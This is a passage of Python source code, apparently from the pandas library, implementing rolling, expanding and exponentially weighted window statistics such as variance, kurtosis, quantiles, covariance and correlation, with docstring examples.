return self._apply('roll_max', 'max', **kwargs)
_shared_docs['min'] = dedent("""
%(name)s minimum
""")
def min(self, *args, **kwargs):
nv.validate_window_func('min', args, kwargs)
return self._apply('roll_min', 'min', **kwargs)
def mean(self, *args, **kwargs):
nv.validate_window_func('mean', args, kwargs)
return self._apply('roll_mean', 'mean', **kwargs)
_shared_docs['median'] = dedent("""
%(name)s median
""")
def median(self, **kwargs):
return self._apply('roll_median_c', 'median', **kwargs)
_shared_docs['std'] = dedent("""
Calculate %(name)s standard deviation.
Normalized by N-1 by default. This can be changed using the `ddof`
argument.
Parameters
----------
ddof : int, default 1
Delta Degrees of Freedom. The divisor used in calculations
is ``N - ddof``, where ``N`` represents the number of elements.
*args, **kwargs
For NumPy compatibility. No additional arguments are used.
Returns
-------
Series or DataFrame
Returns the same object type as the caller of the %(name)s calculation.
See Also
--------
Series.%(name)s : Calling object with Series data
DataFrame.%(name)s : Calling object with DataFrames
Series.std : Equivalent method for Series
DataFrame.std : Equivalent method for DataFrame
numpy.std : Equivalent method for Numpy array
Notes
-----
The default `ddof` of 1 used in Series.std is different than the default
`ddof` of 0 in numpy.std.
A minimum of one period is required for the rolling calculation.
Examples
--------
>>> s = pd.Series([5, 5, 6, 7, 5, 5, 5])
>>> s.rolling(3).std()
0 NaN
1 NaN
2 0.577350
3 1.000000
4 1.000000
5 1.154701
6 0.000000
dtype: float64
>>> s.expanding(3).std()
0 NaN
1 NaN
2 0.577350
3 0.957427
4 0.894427
5 0.836660
6 0.786796
dtype: float64
""")
def std(self, ddof=1, *args, **kwargs):
nv.validate_window_func('std', args, kwargs)
window = self._get_window()
index, indexi = self._get_index()
def f(arg, *args, **kwargs):
minp = _require_min_periods(1)(self.min_periods, window)
return _zsqrt(_window.roll_var(arg, window, minp, indexi,
self.closed, ddof))
return self._apply(f, 'std', check_minp=_require_min_periods(1),
ddof=ddof, **kwargs)
_shared_docs['var'] = dedent("""
Calculate unbiased %(name)s variance.
Normalized by N-1 by default. This can be changed using the `ddof`
argument.
Parameters
----------
ddof : int, default 1
Delta Degrees of Freedom. The divisor used in calculations
is ``N - ddof``, where ``N`` represents the number of elements.
*args, **kwargs
For NumPy compatibility. No additional arguments are used.
Returns
-------
Series or DataFrame
Returns the same object type as the caller of the %(name)s calculation.
See Also
--------
Series.%(name)s : Calling object with Series data
DataFrame.%(name)s : Calling object with DataFrames
Series.var : Equivalent method for Series
DataFrame.var : Equivalent method for DataFrame
numpy.var : Equivalent method for Numpy array
Notes
-----
The default `ddof` of 1 used in :meth:`Series.var` is different than the
default `ddof` of 0 in :func:`numpy.var`.
A minimum of 1 period is required for the rolling calculation.
Examples
--------
>>> s = pd.Series([5, 5, 6, 7, 5, 5, 5])
>>> s.rolling(3).var()
0 NaN
1 NaN
2 0.333333
3 1.000000
4 1.000000
5 1.333333
6 0.000000
dtype: float64
>>> s.expanding(3).var()
0 NaN
1 NaN
2 0.333333
3 0.916667
4 0.800000
5 0.700000
6 0.619048
dtype: float64
""")
def var(self, ddof=1, *args, **kwargs):
nv.validate_window_func('var', args, kwargs)
return self._apply('roll_var', 'var',
check_minp=_require_min_periods(1), ddof=ddof,
**kwargs)
_shared_docs['skew'] = """Unbiased %(name)s skewness"""
def skew(self, **kwargs):
return self._apply('roll_skew', 'skew',
check_minp=_require_min_periods(3), **kwargs)
_shared_docs['kurt'] = dedent("""
Calculate unbiased %(name)s kurtosis.
This function uses Fisher's definition of kurtosis without bias.
Parameters
----------
**kwargs
Under Review.
Returns
-------
Series or DataFrame
Returned object type is determined by the caller of the %(name)s
calculation
See Also
--------
Series.%(name)s : Calling object with Series data
DataFrame.%(name)s : Calling object with DataFrames
Series.kurt : Equivalent method for Series
DataFrame.kurt : Equivalent method for DataFrame
scipy.stats.skew : Third moment of a probability density
scipy.stats.kurtosis : Reference SciPy method
Notes
-----
A minimum of 4 periods is required for the %(name)s calculation.
""")
def kurt(self, **kwargs):
return self._apply('roll_kurt', 'kurt',
check_minp=_require_min_periods(4), **kwargs)
_shared_docs['quantile'] = dedent("""
%(name)s quantile
Parameters
----------
quantile : float
0 <= quantile <= 1""")
def quantile(self, quantile, **kwargs):
window = self._get_window()
index, indexi = self._get_index()
def f(arg, *args, **kwargs):
minp = _use_window(self.min_periods, window)
if quantile == 1.0:
return _window.roll_max(arg, window, minp, indexi,
self.closed)
elif quantile == 0.0:
return _window.roll_min(arg, window, minp, indexi,
self.closed)
else:
return _window.roll_quantile(arg, window, minp, indexi,
self.closed, quantile)
return self._apply(f, 'quantile', quantile=quantile,
**kwargs)
_shared_docs['cov'] = dedent("""
%(name)s sample covariance
Parameters
----------
other : Series, DataFrame, or ndarray, optional
        If not supplied, defaults to self and produces pairwise output
pairwise : bool, default None
If False then only matching columns between self and other will be used
and the output will be a DataFrame.
If True then all pairwise combinations will be calculated and the
output will be a MultiIndexed DataFrame in the case of DataFrame
inputs. In the case of missing elements, only complete pairwise
observations will be used.
ddof : int, default 1
Delta Degrees of Freedom. The divisor used in calculations
is ``N - ddof``, where ``N`` represents the number of elements.""")
def cov(self, other=None, pairwise=None, ddof=1, **kwargs):
if other is None:
other = self._selected_obj
# only default unset
pairwise = True if pairwise is None else pairwise
other = self._shallow_copy(other)
# GH 16058: offset window
if self.is_freq_type:
window = self.win_freq
else:
window = self._get_window(other)
def _get_cov(X, Y):
# GH #12373 : rolling functions error on float32 data
# to avoid potential overflow, cast the data to float64
X = X.astype('float64')
Y = Y.astype('float64')
mean = lambda x: x.rolling(window, self.min_periods,
center=self.center).mean(**kwargs)
count = (X + Y).rolling(window=window,
center=self.center).count(**kwargs)
bias_adj = count / (count - ddof)
return (mean(X * Y) - mean(X) * mean(Y)) * bias_adj
return _flex_binary_moment(self._selected_obj, other._selected_obj,
_get_cov, pairwise=bool(pairwise))
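    # Illustrative sketch (not part of pandas): the estimator in _get_cov above is
    # "mean of products minus product of means", rescaled by count / (count - ddof)
    # to undo small-sample bias. For one window holding x = [1, 2, 3], y = [2, 4, 6]:
    #   mean(x*y) - mean(x)*mean(y) = 28/3 - 8 = 4/3   (biased, ddof=0)
    #   bias_adj = 3 / (3 - 1) = 1.5  ->  cov = 2.0    (agrees with np.cov(x, y))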
_shared_docs['corr'] = dedent("""
%(name)s sample correlation
Parameters
----------
other : Series, DataFrame, or ndarray, optional
        If not supplied, defaults to self and produces pairwise output
pairwise : bool, default None
If False then only matching columns between self and other will be
used and the output will be a DataFrame.
If True then all pairwise combinations will be calculated and the
output will be a MultiIndex DataFrame in the case of DataFrame inputs.
In the case of missing elements, only complete pairwise observations
will be used.""")
def corr(self, other=None, pairwise=None, **kwargs):
if other is None:
other = self._selected_obj
# only default unset
pairwise = True if pairwise is None else pairwise
other = self._shallow_copy(other)
window = self._get_window(other)
def _get_corr(a, b):
a = a.rolling(window=window, min_periods=self.min_periods,
center=self.center)
b = b.rolling(window=window, min_periods=self.min_periods,
center=self.center)
return a.cov(b, **kwargs) / (a.std(**kwargs) * b.std(**kwargs))
return _flex_binary_moment(self._selected_obj, other._selected_obj,
_get_corr, pairwise=bool(pairwise))
class Rolling(_Rolling_and_Expanding):
@cache_readonly
def is_datetimelike(self):
return isinstance(self._on,
(ABCDatetimeIndex,
ABCTimedeltaIndex,
ABCPeriodIndex))
@cache_readonly
def _on(self):
if self.on is None:
return self.obj.index
elif (isinstance(self.obj, ABCDataFrame) and
self.on in self.obj.columns):
from pandas import Index
return Index(self.obj[self.on])
else:
raise ValueError("invalid on specified as {0}, "
"must be a column (if DataFrame) "
"or None".format(self.on))
def validate(self):
super(Rolling, self).validate()
# we allow rolling on a datetimelike index
if ((self.obj.empty or self.is_datetimelike) and
isinstance(self.window, (compat.string_types, ABCDateOffset,
timedelta))):
self._validate_monotonic()
freq = self._validate_freq()
# we don't allow center
if self.center:
raise NotImplementedError("center is not implemented "
"for datetimelike and offset "
"based windows")
# this will raise ValueError on non-fixed freqs
self.win_freq = self.window
self.window = freq.nanos
self.win_type = 'freq'
# min_periods must be an integer
if self.min_periods is None:
self.min_periods = 1
elif not is_integer(self.window):
raise ValueError("window must be an integer")
elif self.window < 0:
raise ValueError("window must be non-negative")
if not self.is_datetimelike and self.closed is not None:
raise ValueError("closed only implemented for datetimelike "
"and offset based windows")
def _validate_monotonic(self):
""" validate on is monotonic """
if not self._on.is_monotonic:
formatted = self.on or 'index'
raise ValueError("{0} must be "
"monotonic".format(formatted))
def _validate_freq(self):
""" validate & return window frequency """
from pandas.tseries.frequencies import to_offset
try:
return to_offset(self.window)
except (TypeError, ValueError):
raise ValueError("passed window {0} is not "
"compatible with a datetimelike "
"index".format(self.window))
_agg_doc = dedent("""
Examples
--------
>>> df = pd.DataFrame(np.random.randn(10, 3), columns=['A', 'B', 'C'])
>>> df
A B C
0 -2.385977 -0.102758 0.438822
1 -1.004295 0.905829 -0.954544
2 0.735167 -0.165272 -1.619346
3 -0.702657 -1.340923 -0.706334
4 -0.246845 0.211596 -0.901819
5 2.463718 3.157577 -1.380906
6 -1.142255 2.340594 -0.039875
7 1.396598 -1.647453 1.677227
8 -0.543425 1.761277 -0.220481
9 -0.640505 0.289374 -1.550670
>>> df.rolling(3).sum()
A B C
0 NaN NaN NaN
1 NaN NaN NaN
2 -2.655105 0.637799 -2.135068
3 -0.971785 -0.600366 -3.280224
4 -0.214334 -1.294599 -3.227500
5 1.514216 2.028250 -2.989060
6 1.074618 5.709767 -2.322600
7 2.718061 3.850718 0.256446
8 -0.289082 2.454418 1.416871
9 0.212668 0.403198 -0.093924
>>> df.rolling(3).agg({'A':'sum', 'B':'min'})
A B
0 NaN NaN
1 NaN NaN
2 -2.655105 -0.165272
3 -0.971785 -1.340923
4 -0.214334 -1.340923
5 1.514216 -1.340923
6 1.074618 0.211596
7 2.718061 -1.647453
8 -0.289082 -1.647453
9 0.212668 -1.647453
    See Also
--------
pandas.Series.rolling
pandas.DataFrame.rolling
""")
@Appender(_agg_doc)
@Appender(_shared_docs['aggregate'] % dict(
versionadded='',
klass='Series/DataFrame'))
def aggregate(self, arg, *args, **kwargs):
return super(Rolling, self).aggregate(arg, *args, **kwargs)
agg = aggregate
@Substitution(name='rolling')
@Appender(_doc_template)
@Appender(_shared_docs['count'])
def count(self):
# different impl for freq counting
if self.is_freq_type:
return self._apply('roll_count', 'count')
return super(Rolling, self).count()
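    # Illustrative sketch (not part of pandas): the 'freq' branch above covers
    # offset-based windows such as df.rolling('2s'); validate() resolves the
    # offset through to_offset and stores its length in nanoseconds, e.g.
    #   >>> from pandas.tseries.frequencies import to_offset
    #   >>> to_offset('2s').nanos
    #   2000000000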
@Substitution(name='rolling')
@Appender(_doc_template)
@Appender(_shared_docs['apply'])
def apply(self, func, args=(), kwargs={}):
return super(Rolling, self).apply(func, args=args, kwargs=kwargs)
@Substitution(name='rolling')
@Appender(_doc_template)
@Appender(_shared_docs['sum'])
def sum(self, *args, **kwargs):
nv.validate_rolling_func('sum', args, kwargs)
return super(Rolling, self).sum(*args, **kwargs)
@Substitution(name='rolling')
@Appender(_doc_template)
@Appender(_shared_docs['max'])
def max(self, *args, **kwargs):
nv.validate_rolling_func('max', args, kwargs)
return super(Rolling, self).max(*args, **kwargs)
@Substitution(name='rolling')
@Appender(_doc_template)
@Appender(_shared_docs['min'])
def min(self, *args, **kwargs):
nv.validate_rolling_func('min', args, kwargs)
return super(Rolling, self).min(*args, **kwargs)
@Substitution(name='rolling')
@Appender(_doc_template)
@Appender(_shared_docs['mean'])
def mean(self, *args, **kwargs):
nv.validate_rolling_func('mean', args, kwargs)
return super(Rolling, self).mean(*args, **kwargs)
@Substitution(name='rolling')
@Appender(_doc_template)
@Appender(_shared_docs['median'])
def median(self, **kwargs):
return super(Rolling, self).median(**kwargs)
@Substitution(name='rolling')
@Appender(_shared_docs['std'])
def std(self, ddof=1, *args, **kwargs):
nv.validate_rolling_func('std', args, kwargs)
return super(Rolling, self).std(ddof=ddof, **kwargs)
@Substitution(name='rolling')
@Appender(_shared_docs['var'])
def var(self, ddof=1, *args, **kwargs):
nv.validate_rolling_func('var', args, kwargs)
return super(Rolling, self).var(ddof=ddof, **kwargs)
@Substitution(name='rolling')
@Appender(_doc_template)
@Appender(_shared_docs['skew'])
def skew(self, **kwargs):
return super(Rolling, self).skew(**kwargs)
_agg_doc = dedent("""
Examples
--------
The example below will show a rolling calculation with a window size of
four matching the equivalent function call using `scipy.stats`.
>>> arr = [1, 2, 3, 4, 999]
>>> fmt = "{0:.6f}" # limit the printed precision to 6 digits
>>> import scipy.stats
>>> print(fmt.format(scipy.stats.kurtosis(arr[:-1], bias=False)))
-1.200000
>>> print(fmt.format(scipy.stats.kurtosis(arr[1:], bias=False)))
3.999946
>>> s = pd.Series(arr)
>>> s.rolling(4).kurt()
0 NaN
1 NaN
2 NaN
3 -1.200000
4 3.999946
dtype: float64
""")
@Appender(_agg_doc)
@Substitution(name='rolling')
@Appender(_shared_docs['kurt'])
def kurt(self, **kwargs):
return super(Rolling, self).kurt(**kwargs)
@Substitution(name='rolling')
@Appender(_doc_template)
@Appender(_shared_docs['quantile'])
def quantile(self, quantile, **kwargs):
return super(Rolling, self).quantile(quantile=quantile, **kwargs)
@Substitution(name='rolling')
@Appender(_doc_template)
@Appender(_shared_docs['cov'])
def cov(self, other=None, pairwise=None, ddof=1, **kwargs):
return super(Rolling, self).cov(other=other, pairwise=pairwise,
ddof=ddof, **kwargs)
@Substitution(name='rolling')
@Appender(_doc_template)
@Appender(_shared_docs['corr'])
def corr(self, other=None, pairwise=None, **kwargs):
return super(Rolling, self).corr(other=other, pairwise=pairwise,
**kwargs)
class RollingGroupby(_GroupByMixin, Rolling):
"""
Provides a rolling groupby implementation
.. versionadded:: 0.18.1
"""
@property
def _constructor(self):
return Rolling
def _gotitem(self, key, ndim, subset=None):
# we are setting the index on the actual object
# here so our index is carried thru to the selected obj
# when we do the splitting for the groupby
if self.on is not None:
self._groupby.obj = self._groupby.obj.set_index(self._on)
self.on = None
return super(RollingGroupby, self)._gotitem(key, ndim, subset=subset)
def _validate_monotonic(self):
"""
validate that on is monotonic;
we don't care for groupby.rolling
because we have already validated at a higher
level
"""
pass
class Expanding(_Rolling_and_Expanding):
"""
Provides expanding transformations.
.. versionadded:: 0.18.0
Parameters
----------
min_periods : int, default 1
Minimum number of observations in window required to have a value
(otherwise result is NA).
center : boolean, default False
Set the labels at the center of the window.
axis : int or string, default 0
Returns
-------
a Window sub-classed for the particular operation
Examples
--------
    >>> df = pd.DataFrame({'B': [0, 1, 2, np.nan, 4]})
B
0 0.0
1 1.0
2 2.0
3 NaN
4 4.0
>>> df.expanding(2).sum()
B
0 NaN
1 1.0
2 3.0
3 3.0
4 7.0
Notes
-----
By default, the result is set to the right edge of the window. This can be
changed to the center of the window by setting ``center=True``.
See Also
--------
rolling : Provides rolling window calculations
ewm : Provides exponential weighted functions
"""
_attributes = ['min_periods', 'center', 'axis']
def __init__(self, obj, min_periods=1, center=False, axis=0,
**kwargs):
super(Expanding, self).__init__(obj=obj, min_periods=min_periods,
center=center, axis=axis)
@property
def _constructor(self):
return Expanding
def _get_window(self, other=None):
obj = self._selected_obj
if other is None:
return (max(len(obj), self.min_periods) if self.min_periods
else len(obj))
return (max((len(obj) + len(obj)), self.min_periods)
if self.min_periods else (len(obj) + len(obj)))
_agg_doc = dedent("""
Examples
--------
>>> df = pd.DataFrame(np.random.randn(10, 3), columns=['A', 'B', 'C'])
>>> df
A B C
0 -2.385977 -0.102758 0.438822
1 -1.004295 0.905829 -0.954544
2 0.735167 -0.165272 -1.619346
3 -0.702657 -1.340923 -0.706334
4 -0.246845 0.211596 -0.901819
5 2.463718 3.157577 -1.380906
6 -1.142255 2.340594 -0.039875
7 1.396598 -1.647453 1.677227
8 -0.543425 1.761277 -0.220481
9 -0.640505 0.289374 -1.550670
>>> df.ewm(alpha=0.5).mean()
A B C
0 -2.385977 -0.102758 0.438822
1 -1.464856 0.569633 -0.490089
2 -0.207700 0.149687 -1.135379
3 -0.471677 -0.645305 -0.906555
4 -0.355635 -0.203033 -0.904111
5 1.076417 1.503943 -1.146293
6 -0.041654 1.925562 -0.588728
7 0.680292 0.132049 0.548693
8 0.067236 0.948257 0.163353
9 -0.286980 0.618493 -0.694496
    See Also
--------
pandas.DataFrame.expanding.aggregate
pandas.DataFrame.rolling.aggregate
pandas.DataFrame.aggregate
""")
@Appender(_agg_doc)
@Appender(_shared_docs['aggregate'] % dict(
versionadded='',
klass='Series/DataFrame'))
def aggregate(self, arg, *args, **kwargs):
return super(Expanding, self).aggregate(arg, *args, **kwargs)
agg = aggregate
@Substitution(name='expanding')
@Appender(_doc_template)
@Appender(_shared_docs['count'])
def count(self, **kwargs):
return super(Expanding, self).count(**kwargs)
@Substitution(name='expanding')
@Appender(_doc_template)
@Appender(_shared_docs['apply'])
def apply(self, func, args=(), kwargs={}):
return super(Expanding, self).apply(func, args=args, kwargs=kwargs)
@Substitution(name='expanding')
@Appender(_doc_template)
@Appender(_shared_docs['sum'])
def sum(self, *args, **kwargs):
nv.validate_expanding_func('sum', args, kwargs)
return super(Expanding, self).sum(*args, **kwargs)
@Substitution(name='expanding')
@Appender(_doc_template)
@Appender(_shared_docs['max'])
def max(self, *args, **kwargs):
nv.validate_expanding_func('max', args, kwargs)
return super(Expanding, self).max(*args, **kwargs)
@Substitution(name='expanding')
@Appender(_doc_template)
@Appender(_shared_docs['min'])
def min(self, *args, **kwargs):
nv.validate_expanding_func('min', args, kwargs)
return super(Expanding, self).min(*args, **kwargs)
@Substitution(name='expanding')
@Appender(_doc_template)
@Appender(_shared_docs['mean'])
def mean(self, *args, **kwargs):
nv.validate_expanding_func('mean', args, kwargs)
return super(Expanding, self).mean(*args, **kwargs)
@Substitution(name='expanding')
@Appender(_doc_template)
@Appender(_shared_docs['median'])
def median(self, **kwargs):
return super(Expanding, self).median(**kwargs)
@Substitution(name='expanding')
@Appender(_shared_docs['std'])
def std(self, ddof=1, *args, **kwargs):
nv.validate_expanding_func('std', args, kwargs)
return super(Expanding, self).std(ddof=ddof, **kwargs)
@Substitution(name='expanding')
@Appender(_shared_docs['var'])
def var(self, ddof=1, *args, **kwargs):
nv.validate_expanding_func('var', args, kwargs)
return super(Expanding, self).var(ddof=ddof, **kwargs)
@Substitution(name='expanding')
@Appender(_doc_template)
@Appender(_shared_docs['skew'])
def skew(self, **kwargs):
return super(Expanding, self).skew(**kwargs)
_agg_doc = dedent("""
Examples
--------
    The example below will show an expanding calculation with a minimum of
    four periods matching the equivalent function call using `scipy.stats`.
>>> arr = [1, 2, 3, 4, 999]
>>> import scipy.stats
>>> fmt = "{0:.6f}" # limit the printed precision to 6 digits
>>> print(fmt.format(scipy.stats.kurtosis(arr[:-1], bias=False)))
-1.200000
>>> print(fmt.format(scipy.stats.kurtosis(arr, bias=False)))
4.999874
>>> s = pd.Series(arr)
>>> s.expanding(4).kurt()
0 NaN
1 NaN
2 NaN
3 -1.200000
4 4.999874
dtype: float64
""")
@Appender(_agg_doc)
@Substitution(name='expanding')
@Appender(_shared_docs['kurt'])
def kurt(self, **kwargs):
return super(Expanding, self).kurt(**kwargs)
@Substitution(name='expanding')
@Appender(_doc_template)
@Appender(_shared_docs['quantile'])
def quantile(self, quantile, **kwargs):
return super(Expanding, self).quantile(quantile=quantile, **kwargs)
@Substitution(name='expanding')
@Appender(_doc_template)
@Appender(_shared_docs['cov'])
def cov(self, other=None, pairwise=None, ddof=1, **kwargs):
return super(Expanding, self).cov(other=other, pairwise=pairwise,
ddof=ddof, **kwargs)
@Substitution(name='expanding')
@Appender(_doc_template)
@Appender(_shared_docs['corr'])
def corr(self, other=None, pairwise=None, **kwargs):
return super(Expanding, self).corr(other=other, pairwise=pairwise,
**kwargs)
class ExpandingGroupby(_GroupByMixin, Expanding):
"""
    Provides an expanding groupby implementation
.. versionadded:: 0.18.1
"""
@property
def _constructor(self):
return Expanding
_bias_template = """
Parameters
----------
bias : boolean, default False
Use a standard estimation bias correction
"""
_pairwise_template = """
Parameters
----------
other : Series, DataFrame, or ndarray, optional
    If not supplied, defaults to self and produces pairwise output
pairwise : bool, default None
If False then only matching columns between self and other will be used and
the output will be a DataFrame.
If True then all pairwise combinations will be calculated and the output
will be a MultiIndex DataFrame in the case of DataFrame inputs.
In the case of missing elements, only complete pairwise observations will
be used.
bias : boolean, default False
Use a standard estimation bias correction
"""
class EWM(_Rolling):
r"""
Provides exponential weighted functions
.. versionadded:: 0.18.0
Parameters
----------
com : float, optional
Specify decay in terms of center of mass,
:math:`\alpha = 1 / (1 + com),\text{ for } com \geq 0`
span : float, optional
Specify decay in terms of span,
:math:`\alpha = 2 / (span + 1),\text{ for } span \geq 1`
halflife : float, optional
Specify decay in terms of half-life,
:math:`\alpha = 1 - exp(log(0.5) / halflife),\text{ for } halflife > 0`
alpha : float, optional
Specify smoothing factor :math:`\alpha` directly,
:math:`0 < \alpha \leq 1`
.. versionadded:: 0.18.0
min_periods : int, default 0
Minimum number of observations in window required to have a value
(otherwise result is NA).
adjust : boolean, default True
Divide by decaying adjustment factor in beginning periods to account
for imbalance in relative weightings (viewing EWMA as a moving average)
ignore_na : boolean, default False
Ignore missing values when calculating weights;
specify True to reproduce pre-0.15.0 behavior
Returns
-------
a Window sub-classed for the particular operation
Examples
--------
    >>> df = pd.DataFrame({'B': [0, 1, 2, np.nan, 4]})
B
0 0.0
1 1.0
2 2.0
3 NaN
4 4.0
>>> df.ewm(com=0.5).mean()
B
0 0.000000
1 0.750000
2 1.615385
3 1.615385
4 3.670213
Notes
-----
Exactly one of center of mass, span, half-life, and alpha must be provided.
Allowed values and relationship between the parameters are specified in the
parameter descriptions above; see the link at the end of this section for
a detailed explanation.
When adjust is True (default), weighted averages are calculated using
weights (1-alpha)**(n-1), (1-alpha)**(n-2), ..., 1-alpha, 1.
When adjust is False, weighted averages are calculated recursively as:
weighted_average[0] = arg[0];
weighted_average[i] = (1-alpha)*weighted_average[i-1] + alpha*arg[i].
When ignore_na is False (default), weights are based on absolute positions.
For example, the weights of x and y used in calculating the final weighted
average of [x, None, y] are (1-alpha)**2 and 1 (if adjust is True), and
(1-alpha)**2 and alpha (if adjust is False).
When ignore_na is True (reproducing pre-0.15.0 behavior), weights are based
on relative positions. For example, the weights of x and y used in
calculating the final weighted average of [x, None, y] are 1-alpha and 1
(if adjust is True), and 1-alpha and alpha (if adjust is False).
More details can be found at
http://pandas.pydata.org/pandas-docs/stable/computation.html#exponentially-weighted-windows
See Also
--------
rolling : Provides rolling window calculations
expanding : Provides expanding transformations.
"""
_attributes = ['com', 'min_periods', 'adjust', 'ignore_na', 'axis']
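    # Illustrative sketch (not part of pandas): the Notes in the class docstring,
    # evaluated for a concrete alpha = 0.5 and data [x, NaN, y]:
    #   adjust=True,  ignore_na=False -> weights (1-0.5)**2 = 0.25 on x and 1 on y
    #   adjust=False, ignore_na=False -> weights 0.25 on x and alpha = 0.5 on y
    #   ignore_na=True uses relative positions, so x's weight becomes 1-0.5 = 0.5
    #   (with y weighted 1 if adjust=True, or alpha = 0.5 if adjust=False).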
def __init__(self, obj, com=None, span=None, halflife=None, alpha=None,
min_periods=0, adjust=True, ignore_na=False,
axis=0):
self.obj = obj
self.com = _get_center_of_mass(com, span, halflife, alpha)
self.min_periods = min_periods
self.adjust = adjust
self.ignore_na = ignore_na
self.axis = axis
self.on = None
@property
def _constructor(self):
return EWM
_agg_doc = dedent("""
Examples
--------
>>> df = pd.DataFrame(np.random.randn(10, 3), columns=['A', 'B', 'C'])
>>> df
A B C
0 -2.385977 -0.102758 0.438822
1 -1.004295 0.905829 -0.954544
2 0.735167 -0.165272 -1.619346
3 -0.702657 -1.340923 -0.706334
4 -0.246845 0.211596 -0.901819
5 2.463718 3.157577 -1.380906
6 -1.142255 2.340594 -0.039875
7 1.396598 -1.647453 1.677227
8 -0.543425 1.761277 -0.220481
9 -0.640505 0.289374 -1.550670
>>> df.ewm(alpha=0.5).mean()
A B C
0 -2.385977 -0.102758 0.438822
1 -1.464856 0.569633 -0.490089
2 -0.207700 0.149687 -1.135379
3 -0.471677 -0.645305 -0.906555
4 -0.355635 -0.203033 -0.904111
5 1.076417 1.503943 -1.146293
6 -0.041654 1.925562 -0.588728
7 0.680292 0.132049 0.548693
8 0.067236 0.948257 0.163353
9 -0.286980 0.618493 -0.694496
    See Also
--------
pandas.DataFrame.rolling.aggregate
""")
@Appender(_agg_doc)
@Appender(_shared_docs['aggregate'] % dict(
versionadded='',
klass='Series/DataFrame'))
def aggregate(self, arg, *args, **kwargs):
return super(EWM, self).aggregate(arg, *args, **kwargs)
agg = aggregate
def _apply(self, func, **kwargs):
"""Rolling statistical measure using supplied function. Designed to be
used with passed-in Cython array-based functions.
Parameters
----------
func : string/callable to apply
Returns
-------
y : type of input argument
"""
blocks, obj, index = self._create_blocks()
results = []
for b in blocks:
try:
values = self._prep_values(b.values)
except TypeError:
results.append(b.values.copy())
continue
if values.size == 0:
results.append(values.copy())
continue
# if we have a string function name, wrap it
if isinstance(func, compat.string_types):
cfunc = getattr(_window, func, None)
if cfunc is None:
raise ValueError("we do not support this function "
"in _window.{0}".format(func))
def func(arg):
return cfunc(arg, self.com, int(self.adjust),
int(self.ignore_na), int(self.min_periods))
results.append(np.apply_along_axis(func, self.axis, values))
return self._wrap_results(results, blocks, obj)
@Substitution(name='ewm')
@Appender(_doc_template)
def mean(self, *args, **kwargs):
"""exponential weighted moving average"""
nv.validate_window_func('mean', args, kwargs)
return self._apply('ewma', **kwargs)
@Substitution(name='ewm')
@Appender(_doc_template)
@Appender(_bias_template)
def std(self, bias=False, *args, **kwargs):
"""exponential weighted moving stddev"""
nv.validate_window_func('std', args, kwargs)
return _zsqrt(self.var(bias=bias, **kwargs))
vol = std
@Substitution(name='ewm')
@Appender(_doc_template)
@Appender(_bias_template)
def var(self, bias=False, *args, **kwargs):
"""exponential weighted moving variance"""
nv.validate_window_func('var', args, kwargs)
def f(arg):
return _window.ewmcov(arg, arg, self.com, int(self.adjust),
int(self.ignore_na), int(self.min_periods),
int(bias))
return self._apply(f, **kwargs)
@Substitution(name='ewm')
@Appender(_doc_template)
@Appender(_pairwise_template)
def cov(self, other=None, pairwise=None, bias=False, **kwargs):
"""exponential weighted sample covariance"""
if other is None:
other = self._selected_obj
# only default unset
pairwise = True if pairwise is None else pairwise
other = self._shallow_copy(other)
def _get_cov(X, Y):
X = self._shallow_copy(X)
Y = self._shallow_copy(Y)
cov = _window.ewmcov(X._prep_values(), Y._prep_values(), self.com,
int(self.adjust), int(self.ignore_na),
int(self.min_periods), int(bias))
return X._wrap_result(cov)
return _flex_binary_moment(self._selected_obj, other._selected_obj,
_get_cov, pairwise=bool(pairwise))
@Substitution(name='ewm')
@Appender(_doc_template)
@Appender(_pairwise_template)
def corr(self, other=None, pairwise=None, **kwargs):
"""exponential weighted sample correlation"""
if other is None:
other = self._selected_obj
# only default unset
pairwise = True if pairwise is None else pairwise
other = self._shallow_copy(other)
def _get_corr(X, Y):
X = self._shallow_copy(X)
Y = self._shallow_copy(Y)
def _cov(x, y):
return _window.ewmcov(x, y, self.com, int(self.adjust),
int(self.ignore_na),
int(self.min_periods),
1)
x_values = X._prep_values()
y_values = Y._prep_values()
with np.errstate(all='ignore'):
cov = _cov(x_values, y_values)
x_var = _cov(x_values, x_values)
y_var = _cov(y_values, y_values)
corr = cov / _zsqrt(x_var * y_var)
return X._wrap_result(corr)
return _flex_binary_moment(self._selected_obj, other._selected_obj,
_get_corr, pairwise=bool(pairwise))
# Helper Funcs
def _flex_binary_moment(arg1, arg2, f, pairwise=False):
if not (isinstance(arg1, (np.ndarray, ABCSeries, ABCDataFrame)) and
isinstance(arg2, (np.ndarray, ABCSeries, ABCDataFrame))):
raise TypeError("arguments to moment function must be of type "
"np.ndarray/Series/DataFrame")
if (isinstance(arg1, (np.ndarray, ABCSeries)) and
isinstance(arg2, (np.ndarray, ABCSeries))):
X, Y = _prep_binary(arg1, arg2)
return f(X, Y)
elif isinstance(arg1, ABCDataFrame):
from pandas import DataFrame
def dataframe_from_int_dict(data, frame_template):
result = DataFrame(data, index=frame_template.index)
if len(result.columns) > 0:
result.columns = frame_template.columns[result.columns]
return result
results = {}
if isinstance(arg2, ABCDataFrame):
if pairwise is False:
if arg1 is arg2:
# special case in order to handle duplicate column names
for i, col in enumerate(arg1.columns):
results[i] = f(arg1.iloc[:, i], arg2.iloc[:, i])
return dataframe_from_int_dict(results, arg1)
else:
if not arg1.columns.is_unique:
raise ValueError("'arg1' columns are not unique")
if not arg2.columns.is_unique:
raise ValueError("'arg2' columns are not unique")
with warnings.catch_warnings(record=True):
X, Y = arg1.align(arg2, join='outer')
X = X + 0 * Y
Y = Y + 0 * X
with warnings.catch_warnings(record=True):
res_columns = arg1.columns.union(arg2.columns)
for col in res_columns:
if col in X and col in Y:
results[col] = f(X[col], Y[col])
return DataFrame(results, index=X.index,
columns=res_columns)
elif pairwise is True:
results = defaultdict(dict)
for i, k1 in enumerate(arg1.columns):
for j, k2 in enumerate(arg2.columns):
if j < i and arg2 is arg1:
# Symmetric case
results[i][j] = results[j][i]
else:
results[i][j] = f(*_prep_binary(arg1.iloc[:, i],
arg2.iloc[:, j]))
from pandas import MultiIndex, concat
result_index = arg1.index.union(arg2.index)
if len(result_index):
# construct result frame
result = concat(
[concat([results[i][j]
for j, c in enumerate(arg2.columns)],
ignore_index=True)
for i, c in enumerate(arg1.columns)],
ignore_index=True,
axis=1)
result.columns = arg1.columns
# set the index and reorder
if arg2.columns.nlevels > 1:
result.index = MultiIndex.from_product(
arg2.columns.levels + [result_index])
result = result.reorder_levels([2, 0, 1]).sort_index()
else:
result.index = MultiIndex.from_product(
[range(len(arg2.columns)),
range(len(result_index))])
